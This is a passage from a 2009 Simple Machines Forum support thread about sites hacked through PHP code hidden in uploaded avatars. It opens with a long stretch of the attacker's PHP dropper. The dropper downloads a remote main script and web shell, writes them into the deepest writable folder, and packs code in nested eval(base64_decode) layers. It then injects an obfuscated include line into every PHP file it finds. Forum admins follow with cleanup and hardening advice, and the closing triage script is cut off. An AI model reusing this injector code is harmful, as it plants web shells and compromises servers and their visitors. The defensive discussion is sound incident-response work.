$query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n";
$query = $query . "\r\n";
$errno = 0;
$error = "";
$sock = fsockopen($url_info[host], $url_info[port], $errno, $error, $connect_timeout);
$h = array();
$resp = array();
if($sock){
stream_set_timeout($sock, $connect_timeout);
fwrite($sock, $query);
$hd = false;
while(!feof($sock)){
$l = fgets($sock);
if(!$hd){
if(trim($l) == ''){
$hd = true;
}else{
$h[] = $l;
}
}else{
$resp[] = $l;
}
}
fclose($sock);
}
$ret = implode("", $resp);
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('save_text_to_file')){
function save_text_to_file($fn, $t, $m = '', $r = 0, $silent = false){
global $_GET;
if(isset($_GET['dgd'])){
$silent = false;
}
if($r){
$f = fopen($fn, "w");
}else{
$f = fopen($fn, "a");
}
if($f){
fwrite($f, $t);
fflush($f);
fclose($f);
if(!$silent){
echo $m;
}
/*set_chmod($fn);*/
}else{
if(!$silent){
echo "can't create file $fn";
}
die();
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('replace_substring')){
function replace_substring(&$text, $pret, $postt, $str){
$pos = strpos($text, $pret);
if(!$pos){return false;}
$pre = substr($text, 0, $pos + strlen($pret));
$pos = strpos($text, $postt, $pos);
if(!$pos){return false;}
$post = substr($text, $pos, strlen($text));
if(strlen($pre) && strlen($post)){
$text = $pre.$str.$post;
return true;
}
return false;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod')){
function set_chmod($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0777)){
return('0777');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod_folder')){
function set_chmod_folder($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0666)){
return('0666');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('gfe')){
function gfe($fn){
$ret = '';
$p = strrpos($fn, '.');
if($p){
$ret = (substr($fn, $p+1, strlen($fn)));
return $ret;
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('prepare_pack')){
function prepare_pack($php){
$cycles = 1;
$split_by_functions = 1;
$zip = 0;
if(!function_exists('base64_encode')){
return $php;
}
$ret = preg_replace("/^[^\s]+[\s]/U", "", $php);
$ret = preg_replace("/[\s][^\s]+\Z/", "", $ret);
$ret = trim($ret);
if($split_by_functions){
$tmp = preg_split('/\}\s+function/', $ret);
}else{
$tmp[] = $ret;
}
$skip_first = false;
if(count($tmp)){
$pos = strpos($tmp[0], 'function');
if($pos === 0){
$tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0]));
}else{
$skip_first = true;
}
$ret = '';
$count = 0;
$total = count($tmp);
foreach($tmp as $key=>$val){
$val = preg_replace("/\s+/", " ", $val);
$count++;
$count == $total ? $add = '' : $add = '}';
if($total > 1 && !($count == 1 && $skip_first)){
$next_encoded = 'function '.trim($val).$add;
}else{
$next_encoded = trim($val).$add;
}
if($zip && function_exists('gzdeflate')){
$next_encoded = gzdeflate($next_encoded, 9);
}
$next_encoded = base64_encode($next_encoded);
if($zip && function_exists('gzdeflate')){
$ret .= "eval(gzinflate(base64_decode('{$next_encoded}')));";
}else{
$ret .= "eval(base64_decode('{$next_encoded}'));";
}
}
for($i = 0; $i < $cycles; $i++){
if($zip && function_exists('gzdeflate')){
$ret = gzdeflate($ret, 9);
}
$ret = base64_encode($ret);
if($zip && function_exists('gzdeflate')){
$ret = "eval(gzinflate(base64_decode('{$ret}')));";
}else{
$ret = "eval(base64_decode('{$ret}'));";
}
}
$ret = "<"."?php $ret?".">";
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_folder')){
function clear_folder($folder, $remove = false){
$ret = true;
if(file_exists($folder)){
$h = opendir($folder);
while(strlen($file = readdir($h))){
if($file == '.' || $file == '..'){
continue;
}
if(is_dir($folder.$file)){
$ret = clear_folder($folder.$file.'/', true);
continue;
}
if(!unlink($folder.$file)){
$ret = false;
}
}
closedir($h);
if($remove && !rmdir($folder)){
$ret = false;
}
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

echo"<hr><div align='left'><br clear=\"all\">";

$pms = download($pu, 60);
if($pms){
echo"<b style=\"color:green\">main script download ok [size: " . strlen($pms) . "]</b><br>[543676657]<br>";
leave_clear_php($pms);
}else{
die("<b style=\"color:red\">main download failed [$pu]</b><br>[93771902]<br>");
}

$shl = download($eu, 60);
if($shl){
echo"<b style=\"color:green\">shell download ok [size: " . strlen($shl) . "]</b><br>[599387883]<br>";
leave_clear_php($shl);
}else{
die("<b style=\"color:red\">shell download failed [$eu]</b><br>[759303755]<br>");
}

flush();
$ddrs = array();
$dgmssp = array();
$a = false;
$GLOBALS['dgdirs'] = array();
echo"<h3>LOOKING FOR THE LONGEST PATH</h3>";
echo"<small>";

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
if($path <> '/'){
if(isset($_GET['details'])){
echo"<h4>GOTO: $path</h4>";flush();
}
fddir($path, $ddrs, $a);
if(count($ddrs) > 0){
break;
}
}
}
if(!count($ddrs)){
if(isset($_GET['details'])){
echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
}
fddir($GLOBALS['dgsp'], $ddrs, $a);
}

echo"</small>";flush();

$max = 0;
$GLOBALS['dgcp'] = '';
$sep = '';
foreach($ddrs as $key=>$val){
if(!$sep){
if(!(strpos($key, '/') === false)){
$sep = '/';
}else{
$sep = '\\';
}
}
$fldr = explode($sep, $key);
$c = count($fldr);
if($max < $c){
$max = $c;
$GLOBALS['dgcp'] = implode($sep, $fldr);
}
}
if(!$GLOBALS['dgcp']){
die('<b style="color:red">nowhere to write anything</b><br>[4356398573]');
}else{
if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){
die("<b style=\"color:red\">can't save to the document root</b><br>[657834657]");
}
echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>";
$GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']);
}
//setting up filenames
if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){
die("<b style=\"color:red\">failed to set path</b><br>[44883279]");
}
echo"<b style=\"color:green\">path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){
die("<b style=\"color:red\">failed to set name</b><br>[58819152]");
}
echo"<b style=\"color:green\">name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){
die("<b style=\"color:red\">failed to set relative root dir</b><br>[58819152]");
}
echo"<b style=\"color:green\">relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>";

//!!!!!!!!!!!!!!!!!!!!!!!!!!! attention !!!!!!!!!!!!!!!!!!!!!!! if this code executed by eval() command, HAVE TO COMMENT THIS
/*
if(!replace_substring($pms, '$GLOBALS[\'dgep\'] = "', '";', $_SERVER['SCRIPT_FILENAME'])){
echo"<b style=\"color:red\">failed to set path to exploit</b><br>[5093713]<br>";
}else{
echo"<b style=\"color:green\">path to exploit successfully set [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[8799102]<br>";
}
*/
//fix filename search
/*
$tmp = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = '';
$f = 0;
foreach($tmp as $key=>$val){
$path .= $val . "/";
if(file_exists($path.$GLOBALS['dgfn'])){
$f = 1;
if(!replace_substring($pms, '$GLOBALS[\'dgfxp\'] = "', '";', $path.$GLOBALS['dgfn'])){
echo"<b style=\"color:red\">failed to set path to fix file</b><br>[9477124]";
}else{
echo"<b style=\"color:green\">path to the file for fix successfully set [{$path}{$GLOBALS['dgfn']}]</b><br>[5018843]<br>";
}
break;
}
}
if(!$f){
echo"<b style=\"color:red\">failed to find path to fix file</b><br>[5488349]";
}
*/
$packed_js = prepare_pack($pms);
//$packed_js = $pms;
$my_size = strval(strlen($packed_js));
while(strlen($my_size) < 7){$my_size = '0' . $my_size;}
if(!replace_substring($pms, '"00'.'0', '";', $my_size)){
die("<b style=\"color:red\">failed to set size</b><br>[86612935]");
}
//$packed_js = $pms;
$packed_js = prepare_pack($pms);
echo"<br>my packed size: $my_size<br>";

save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style=\"color:green\">main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent);
save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1);
/*
if($GLOBALS['dbg']){
save_text_to_file($GLOBALS['fpath'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">!!!!!!!!! test shell path [{$GLOBALS['fpath']}{$GLOBALS['dgsf']}] !!!!!!!!!!</b><br>", 1);
}
*/

function dgrself($path, $silent = true){
global $_GET;
if(!$silent){
echo "restoring functions.php at path [{$path}]<br>";flush();
}
$pf = implode("", file($path));
if($pf){
if(!$silent){
echo"{$path} loaded successfully<hr>";
}
}else{
if(!$silent){
echo"failed to load {$path}<br>[8856284]";
}
}
$pf = '';
$arr = file($path);
foreach($arr as $key=>$val){
if(strpos($val, 'eval(base64_decode') === false){
$pf .= $val;
}
}
save_text_to_file($path, $pf, "file {$path} successfully RESTORED<br>[88293764]<br>", 1, $silent);
}

function fddir($ff, &$madrs, &$flag){
global $_GET;
//if($flag || count($madrs) > 300){
if($flag){
return;
}
$php_found = "";
$writable = 0;
//$folder = realpath($ff);
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!file_exists($folder)){
echo"<font color='red'>{$folder} not exists</font><br>";
return;
}
if(!is_dir($folder)){
echo"<font color='red'>{$folder} is not dir</font><br>";
return;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
$new_dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
if($new_dir_perm <> $dir_perm){
$new_dir_perm = "$dir_perm >> $new_dir_perm";
}
$succ = false;
$rndfl = rand(1,9999999999).'.php';
$f = fopen($folder.$rndfl, "w");
if(!$f){
if(isset($_GET['details'])){
echo"<font color=red>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
}else{
if(isset($_GET['details'])){
echo"<font color=green>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
fclose($f);
if(!unlink($folder.$rndfl)){
if(isset($_GET['details'])){
echo"<font color='red'>{$folder}{$rndfl} failed to delete</font><br>";
}
unset($madrs[$folder]);
}
$writable = 1;
}
if($GLOBALS['rewrite_old'] && $writable && file_exists($folder.$GLOBALS['dgin'])){
echo"<b style=\"color:green\">old js [{$folder}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";
if(file_exists($folder.'cnf')){
$ct = implode('', file($folder.'cnf'));
$ct = preg_replace("/ZGd1aA\=\=.*\n/", '', $ct);
save_text_to_file($folder.'cnf', $ct, "<br>config file updated<br>", 1);
//unlink($folder.'cnf');
}
$flag = true;
$madrs = array();
$madrs[$folder] = 1;
return;
}
$h = opendir($folder);
if(!$h){
if(isset($_GET['details'])){
echo"<font color='red'>$folder opendir failed</font><br>";
}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..' || $f == '/' || $f == '\\'){
continue;
}
if(is_dir($folder.$f)){
fddir($folder.$f.'/', $madrs, $flag);
}elseif(is_file($folder.$f) && in_array(strtolower(gfe($folder.$f)), array("php","phtml","php3"))){
$php_found = $folder.$f;
}
}
closedir($h);
if($writable/* && $php_found*/){
$madrs[$folder] = 1;
}
}

$str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['sh_no'])){\$GLOBALS['sh_no']=1;if(file_exists('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}')){include_once('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode(\$d){\$f=ord(substr(\$d,3,1));\$h=10;\$e=0;if(\$f&4){\$e=unpack('v',substr(\$d,10,2));\$e=\$e[1];\$h+=2+\$e;}if(\$f&8){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&16){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&2){\$h+=2;}\$u=gzinflate(substr(\$d,\$h));if(\$u===FALSE){\$u=\$d;}return \$u;}}function dgobh(\$b){Header('Content-Encoding: none');\$c=gzdecode(\$b);if(preg_match('/\<body/si',\$c)){return preg_replace('/(\<body[^\>]*\>)/si','\$1'.gml(),\$c);}else{return gml().\$c;}}ob_start('dgobh');}}}";

$str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>";
echo"<small>";
echo"<h3>INJECTING PHP FILES</h3>";
$GLOBALS['dgdirs'] = array();
$GLOBALS['dgfiles'] = array();

echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
phpinj($GLOBALS['dgsp'], $str, 1, 0);

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
echo"<h4>GOTO: $path</h4>";
phpinj($path, $str, 1, 0);
}

die("</small><hr><b>dgok</b></div>");

Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147

Yeah that was the IP that he had when he paid my forum a visit too.


Very informative post, thanx all.

I am running 1.1.8, and after having problems with user avatars displaying, it didn't take long to be led to this post identifying "Krisbarteo", which I found was a user on my site.

I have banned/deleted the account, however many of my member avatars are still not working. So I am assuming my site must still be affected by that account's attack. Yet, I looked through my PHP files and did not find any of the above listed code embedded in them.

Can someone offer any guidance as to where I should be looking so that I can attempt to remove them? Or could I have not been attacked (even though he was a member) and my avatar problem caused by something else? Although I find it unlikely because the problems did begin shortly after he was a member.

Thanx.

Title: Re: Hacked, script injection
Post by: cowdude on May 10, 2009, 10:32:56 AM
You guys are big help and I appreciate all you are doing.

I want to ask a very specific question.  Once everything is clean, which I have done 3 or 4 times and I did just KRISBARTEO, it has popped back up.  My questions are:

1.  Is the code the "64 Base" crap with a long "string of number" behind it or is that the result of the code that I have missed so far?

2.  Is the code only appearing in .php files or should I be scouring others as well, i.e. htaccess files?

Thanks again.

Cowdude
Title: Re: Hacked, script injection
Post by: DirtRider on May 10, 2009, 12:40:40 PM
Anyone thought of contacting the ISP at all  :D

"CSS GROUP" Ltd.
Caunas street 7A-26, Cesis, LV-4101

Phone: +371 67 404544
Fax: +371 67 414545

E-mail addresses

Common questions: info@cssgroup.lv
Technical support: support@cssgroup.lv
Financial department: billing@cssgroup.lv
Device rent and colocation: colo@cssgroup.lv
SPAM report: abuse@cssgroup.lv
Title: Re: Hacked, script injection
Post by: san2012 on May 10, 2009, 12:46:32 PM
Had the same problem.
What about official answer?
Title: Re: Hacked, script injection
Post by: daveaite on May 10, 2009, 01:56:55 PM
I'm screwed. It's only a matter of time before I get hit. Farewell mates. :(


I'll tighten up security as well and make back-ups, but this is just a pain, I have enough coding troubles as is.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 10, 2009, 04:17:06 PM
Ever think these hackers come here to see what everyone is saying for future research? It wouldn't be hard to come here, look around at all these posts and see what everyone is saying on how to prevent the attacks and then just adjust to our adjustments. Plus, with all the websites listed all around the board they have an unlimited supply of potential victims.

I'm just guessing, but I'm betting that the really dangerous ones can learn all they need from the code alone. It's no major feat to get read access to somebody's live files either. Even I know how to do that. Regardless, what are people supposed to do? It's impractical to just not discuss your products in public as I'm sure you realize.
Title: Re: Hacked, script injection
Post by: WillyP on May 10, 2009, 04:49:04 PM
... however many of my member avatars are still not working. So I am assuming my site must still be affected by that account's attack. Yet, I looked through my PHP files and did not find any of the above listed code embedded in them.

Can someone offer any guidance as to where I should be looking so that I can attempt to remove them? Or could I have not been attacked (even though he was a member) and my avatar problem caused by something else? Although I find it unlikely because the problems did begin shortly after he was a member.

Thanx.



My forum showed no signs of the affliction... a wiki installation on the same domain errored out, that's how I knew there was a problem.

In every file, except for the settings file, there was this at the top, starting on the first line:

Code: [Select]
<?php /**/eval(base64_decode(' [note: there was a very long string of letters and digits here, removed for clarity] =')); ?>
<?php

The avatar used displayed as a 1x1pixel, white dot.
Title: Re: Hacked, script injection
Post by: Relyana on May 10, 2009, 09:14:33 PM

My forum showed no signs of the affliction... a wiki installation on the same domain errored out, that's how I knew there was a problem.


What do you mean by that? He registered on my forum too with both of his nicknames. He only activated one of his accounts and uploaded the fake avatar containing that PHP code, but I can't find anything wrong or weird in any other files (it's 4 a.m. here and I'm still searching). He was active for only 1 minute and 9 seconds.

Wouldn't it be safer for everyone if this topic were in a members-only board? (I guess not... just asking)
Title: Re: Hacked, script injection
Post by: Polymath on May 10, 2009, 09:33:31 PM
Right.. In my /FCKeditor/editor/filemanager/browser/default/images/icons there is a folder called /32

with something like 2500 files (no extension) and they are all numbered something like 26ca85f79bc46b4e6ae3a1f00f679fb3

Are these part of SMF or this bloke's stuff? Safe to delete?
Title: Re: Hacked, script injection
Post by: cowdude on May 10, 2009, 11:00:15 PM
That's part of the crap I deleted.  It had no impact.  There is a tool I used that someone referred to on here earlier: ATF-Cleaner @ atribune.org.  I kept cleaning my "temp files" out with this before I uploaded anything.  It worked!

I have 6 sites tied together on one database.  If it hits one, it nails them all.  I am smarter now than 10 days ago about this stuff.

Just for the record my site is getting as tight as a crabs butt...but for now I am counting on you guys as my "DEPENDS" to help me catch my mistakes!

Thanks everyone I believe I am free of the problem now.

Cowdude
Title: Re: Hacked, script injection
Post by: Sarge on May 10, 2009, 11:04:13 PM
Right.. In my /FCKeditor/editor/filemanager/browser/default/images/icons there is a folder called /32

with something like 2500 files (no extension) and they are all numbered something like 26ca85f79bc46b4e6ae3a1f00f679fb3

Are these part of SMF or this bloke's stuff? Safe to delete?

FCKeditor is not part of SMF. Some mods (TinyPortal, for example) seem to install it.
Title: Re: Hacked, script injection
Post by: Polymath on May 10, 2009, 11:08:39 PM
Quote
FCKeditor is not part of SMF. Some mods (TinyPortal, for example) seem to install it.

That's nice.
Do I remove the folder called /32 with all that stuff in it? Is it part of this hacker?
Title: Re: Hacked, script injection
Post by: oakview on May 11, 2009, 01:31:31 AM
Wouldn't setting the "Method of registration employed for new members" to "Member Approval" act as a tar pit of sorts? If I understand the setting correctly, the person applying for forum membership cannot do anything until approved by an admin.

If this assumption is correct, then wouldn't this be a solution of sorts for forums who typically see a low volume of membership applications? Ours is low enough to make it feasible to examine the IP and email addresses and cull out anything suspicious, or perhaps send a canned query of sorts to the listed email address.

Thoughts anyone? Even with the IP block bans I have in place, I'm still getting applicants that are very suspicious.
Title: Re: Hacked, script injection
Post by: Sarge on May 11, 2009, 01:41:22 AM
Quote
FCKeditor is not part of SMF. Some mods (TinyPortal, for example) seem to install it.

That's nice.
Do I remove the folder called /32 with all that stuff in it? Is it part of this hacker?

I'm not sure. But I suggest that you get a backup of that folder (if it's not too large) and then delete it.

However, it's possible that your forum has other problems too... I suggest locking down your site until someone with experience can check it.
Title: Re: Hacked, script injection
Post by: Sarge on May 11, 2009, 01:44:54 AM
oakview, Member Approval seems like a good idea, but perhaps it's not enough.

As a precautionary measure, I suggest disabling all kinds of uploads, including avatars. If you choose to let members use external avatars via a URL, make sure that you also disable downloading avatars at that URL (it's in Admin > Attachments and Avatars > Avatars).
Title: Re: Hacked, script injection
Post by: thebofh on May 11, 2009, 01:52:27 AM
I moved my attachments directory out of public_html some time ago, would I still be vulnerable? I've just implemented bans on the IP ranges, email addresses & usernames mentioned. I've also locked down the newbies group so that they can't upload anything until they have 11 posts and installed that Stop Spam mod.

Is there anything else I should be doing?
Title: Re: Hacked, script injection
Post by: Sarge on May 11, 2009, 01:56:03 AM
If anyone uses TinyPortal or any other mod that allows user uploads, disable those too.
Title: Re: Hacked, script injection
Post by: oakview on May 11, 2009, 02:50:01 AM
Quote
As a precautionary measure, I suggest disabling all kind of uploads...

@Sarge - done! Good advice.
Title: Re: Hacked, script injection
Post by: DirtRider on May 11, 2009, 03:48:01 AM
What about if you are running a gallery  :P
Title: Re: Hacked, script injection
Post by: san2012 on May 11, 2009, 04:48:33 AM
What about if you are running a gallery  :P
I think it has a vulnerability too, because when I went to other infected sites, whose links I found in my HTML after the <body> tag, on some sites I saw an SMF forum but on others a gallery.
Title: Re: Hacked, script injection
Post by: san2012 on May 11, 2009, 04:55:27 AM
Right.. In my /FCKeditor/editor/filemanager/browser/default/images/icons there is a folder called /32

with something like 2500 files (no extension) and they are all numbered something like 26ca85f79bc46b4e6ae3a1f00f679fb3

Are these part of SMF or this bloke's stuff? Safe to delete?
I had the same situation; that's not a part of SMF, that's the hacker's links to other infected sites. But besides deleting this you should find the avatar with <?php code in it, style.css.php (may be another name) and clean every PHP file of the eval(base64_decode( at the top.
Title: Re: Hacked, script injection
Post by: DirtRider on May 11, 2009, 06:47:15 AM
Well I think if you have this mod it should stop a lot of them coming into your site to start with http://custom.simplemachines.org/mods/index.php?mod=1547 (http://custom.simplemachines.org/mods/index.php?mod=1547)
Title: Re: Hacked, script injection
Post by: Relyana on May 11, 2009, 08:23:52 AM
A few days before krisbarteo registered I noticed some weird error logs in cPanel (someone was trying on and on to get to files that didn't exist in my account like /chat, /phpchat, /phpmychat, /roundcubemail and so on) so I banned that whole IP range. He came back the next day using another IP (close enough to the banned ones) so I banned that too.

Last night I only found the avatar with the bad code in it but it was enough to convince me to uninstall all mods, remove all files and run the large upgrade script.

Is it true that SMF 2.0 RC1 is not affected by this vulnerability? I was waiting for the stable release but I'm starting to think that it is about time to move on.
Title: Re: Hacked, script injection
Post by: JBlaze on May 11, 2009, 08:40:38 AM
Please see this topic on how to secure your site.
http://www.simplemachines.org/community/index.php?topic=309717.0
Title: Re: Hacked, script injection
Post by: Relyana on May 11, 2009, 11:08:23 AM
Thank you so much !!! That hacker opened 3 accounts already (krisbarteo, MagicOPromotion and stilusmagic).

The "Stop Spammer" mod is simply fabulous (it made me laugh too: it blocked the account of one of my Global Mods, someone I've known for years :P - his IP and email address are clean but his nickname is in the database - a common name actually).

I can't thank you enough.  O:)

Title: Re: Hacked, script injection
Post by: rthrash on May 11, 2009, 11:17:17 AM
1.1.8 definitely still has some vulnerability regarding themes/avatars: http://www.simplemachines.org/community/index.php?topic=309741.0

Any ideas if this has been fixed in the 2.0 RC, or what the specific bug that allows this to happen is? This really deserves an update pronto.

Off to deploy the Stop Spammer mod.
Title: Re: Hacked, script injection
Post by: JBlaze on May 11, 2009, 11:19:47 AM
1.1.8 definitely still has some vulnerability regarding themes/avatars: http://www.simplemachines.org/community/index.php?topic=309741.0

Any ideas if this has been fixed in the 2.0 RC, or what the specific bug that allows this to happen is? This really deserves an update pronto.

Off to deploy the Stop Spammer mod.

This is an unofficial fix to this hack until an official patch comes out
http://www.simplemachines.org/community/index.php?topic=309717.0
Title: Re: Hacked, script injection
Post by: rthrash on May 11, 2009, 11:23:47 AM
This is an unofficial fix to this hack until an official patch comes out
http://www.simplemachines.org/community/index.php?topic=309717.0

We've disabled all uploads, and the Stop Spammer mod should prevent most signups but there are definitely ways to get around that quickly. So other than shutting down the functionality there's no additional info? Is the same base code in place in the 2.0 branch?
Title: Re: Hacked, script injection
Post by: JBlaze on May 11, 2009, 11:25:18 AM
So far, I have not heard of or seen any attacks that affected the 2.0 version, but that's not to say that it hasn't happened.


What it boils down to is that the avatar that is being uploaded in this attack has php code embedded into it and it is being parsed through the avatar handler.
Title: Re: Hacked, script injection
Post by: rthrash on May 11, 2009, 11:49:38 AM
Thanks for your feedback JBlaze™. Much appreciated and prompt. :D
Title: Re: Hacked, script injection
Post by: JBlaze on May 11, 2009, 11:52:14 AM
Thanks for your feedback JBlaze™. Much appreciated and prompt. :D

No problem. I'm trying to stay one step ahead of this attack and provide the best support I can :)
Title: Re: Hacked, script injection
Post by: rthrash on May 11, 2009, 02:47:35 PM
I can say that the Stop Spammer add-on is really great indeed. It would have saved us all sorts of grief. Had to manually install it due to how locked down we have things right now but very pleased with what it's doing.

Just to confirm though, the install2.xxx bits are for SMF 2.0, correct? That's not totally clear from any instructions and the manual install instructions aren't parsing on the add-on site for version 1.1.8.
Title: Re: Hacked, script injection
Post by: JBlaze on May 11, 2009, 02:50:49 PM
I can say that the Stop Spammer add-on is really great indeed. It would have saved us all sorts of grief. Had to manually install it due to how locked down we have things right now but very pleased with what it's doing.

Just to confirm though, the install2.xxx bits are for SMF 2.0, correct? That's not totally clear from any instructions and the manual install instructions aren't parsing on the add-on site for version 1.1.8.

I will have to look into it as I have had it installed for about a month now and didn't have problems on install. There may have been an update since then. I will post back with my findings.
Title: Re: Hacked, script injection
Post by: DirtRider on May 11, 2009, 03:09:13 PM
I have just installed it on two of my site with no problems at all
Title: Re: Hacked, script injection
Post by: Polymath on May 12, 2009, 01:03:45 AM
I must say it is very nice. I have deleted a whole folder twice.. In my /FCKeditor/editor/filemanager/browser/default/images/icons there is a folder called /32

with something like 2500 files (no extension) and they are all numbered something like 26ca85f79bc46b4e6ae3a1f00f679fb3


And it won't go away.... Very nice.. >:(

Response:   550 Can't remove directory: Directory not empty
Status:   Retrieving directory listing...
Command:   PASV
Response:   227 Entering Passive Mode (209,200,249,149,107,97)
Command:   LIST
Response:   150 Accepted data connection
Response:   226-ASCII
Response:   226-Options: -a -l
Response:   226 29 matches total
Status:   Directory listing successful


Any ideas? Permissions 755 on it drwxr-xr-x

And another question Can I repair the php file and upload as I go, or will it just get written again?
Title: Re: Hacked, script injection
Post by: djkimmel on May 12, 2009, 01:05:22 AM
If this code were placed in my avatar upload/attachments directory htaccess, would it provide protection against an attack like this (I still can't believe anyone could just upload PHP in a '.jpg' file and get it to run?!?) - it was suggested to me after I explained how this person was able to hack my forum (and all other PHP files in every folder):

Code: [Select]
# secure directory by disabling script execution
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI

Order Allow,Deny
Deny from all
<Files ~ "\.(jpeg|jpg|png|gif)$">
Allow from all
</Files>

I'm thinking it might cause a problem since regular attachments are encrypted, though I would think the encrypted attachments should keep them from being used the same as an uploaded avatar was used? Would this code in an htaccess file keep any of the encrypted files from being uploaded and used on the forum? Would it stop a graphic file from executing code?
Title: Re: Hacked, script injection
Post by: MrPhil on May 12, 2009, 11:08:20 AM
If you have PHP code within a .jpg file, I'm not sure that the .htaccess code is going to catch it (since it's not .php). Have you tried making an "innocent" image file (just says "Hello World") and tested it?

Would it be possible to scan incoming image uploads and blank out all script code (everything between <? and ?>, and everything between <script and script>, and whatever else is needed)?
Title: Re: Hacked, script injection
Post by: djkimmel on May 12, 2009, 12:45:46 PM
Haven't tried that yet, but it is a good suggestion.

The 2nd suggestion is beyond my skills at this time... but I'm learning out of necessity :) Might work once I learn how, but maybe the simpler suggestion is to do some limits so members have to be around a while before they can upload or do attachments.

Still can't believe it was so easy for this person to hack SMF and use it on the rest of the site. I've read everything suggested or linked on the few threads regarding this hack and protection in general. I hope that covers any other surprises I might get like this one? No more overconfidence for me. Too much I don't know about this stuff.
Title: Re: Hacked, script injection
Post by: GamingTrend on May 12, 2009, 03:01:24 PM
So I overwrote all but the settings file for SMF Forums 1.8 and I'm still getting code injection.  I'm just not sure where to look at this point...help?

Oh, and when I was allowing uploading of avatars (I've disabled it for now) the avatars would eventually die off and have to be re-uploaded. 
Title: Re: Hacked, script injection
Post by: Agafonov on May 12, 2009, 03:09:09 PM
So I overwrote all but the settings file for SMF Forums 1.8 and I'm still getting code injection.  I'm just not sure where to look at this point...help?

You should remove all files and folders except Settings and attachments.
There are a number of new files injected as well with "hacker's control panel" code.
Then search and remove all files found by:
Code: (sh) [Select]
grep "<?php" attachments/*
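Agafonov's grep, the prepended eval(base64_decode line described earlier in the thread, and the dropper file it includes can be checked in one pass. The script below is an added triage tool, not SMF code and not from any poster here; it assumes the SMF 1.1 layout (PHP files below the forum root, uploads in attachments/), PHP 7.1+, and that the injected line has the shape quoted above.

```php
<?php
// Added triage script for the infection in this thread; not SMF code and not from
// any poster here. Assumes the SMF 1.1 layout (PHP files below the forum root,
// uploads in attachments/) and PHP 7.1+.
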